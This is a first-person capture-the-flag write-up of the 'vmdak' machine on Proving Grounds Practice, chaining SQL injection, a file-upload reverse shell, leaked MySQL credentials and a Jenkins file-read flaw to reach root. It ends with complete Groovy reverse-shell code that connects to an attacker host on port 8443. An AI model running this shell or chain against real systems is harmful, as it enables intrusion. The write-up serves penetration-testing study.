vmdak - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed FTP, SSH, HTTP and non-common HTTPs (9443) ports were open.
FTP Anonymous
FTP anonymous login was allowed and there was a file named config.xml which was jenkins config file. It showed jenkins version and admin password file location.
Web Enumeration
The HTTPs website was Prison Management System site.
Exploit
CVE-2024-3438 (SQLi Login Bypass)
A vulnerability was found in SourceCodester Prison Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /Admin/login.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259691.
I found a CVE for bypassing admin login on Prison Management System Website.
And I was able to login.
CVE-2024-48594 (RCE)
File Upload vulnerability in Prison Management System v.1.0 allows a remote attacker to execute arbitrary code via the file upload component.
I found a repository (https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemRCE.md) which explains how to exploit file upload to obtain remote code execution.
At first I caught a profile photo editing request and changed it to a PHP file.
Then I visited /uploadImage/rev.php endpoint and obtained reverse shell.
Database MySQL Enumeration
Later, I found a directory called database under prison management system. Inside it I found a config file which revealed mysql root password.
Then, I logged in to root and started enumerating mysql database. I found an entry that shows user password.
I tried it and obtained user flag.
Privilege Escalation
Local Port Forwarding to Reach Jenkins
I remembered the config file we found. So at first I executed netstat -ano | grep -i listen and found out port 8080 was only reachable for 127.0.0.1 (localhost).
ligolo-ng
So I setup an ligolo-ng agent and ligolo-ng proxy and added route for 240.0.0.0/4 which is a special subnet for localhost.
CVE-2024-23897 (Jenkins LFI)
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Then I visited the jenkins and it prompted me with admin password.
So, at first I searched jenkins version and found out it was vulnerable to Local File Inclusion. And I found an exploit code for it (https://www.exploit-db.com/exploits/51993). I simply executed it and read the administrator password.
And it started jenkins installation.
Jenkins /script tab
Later, I visited /script tab and simply wrote groovy reverse shell to obtain root shell.
String host="192.168.45.245";
int port=8443;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
After clicking Run button, I obtained root shell.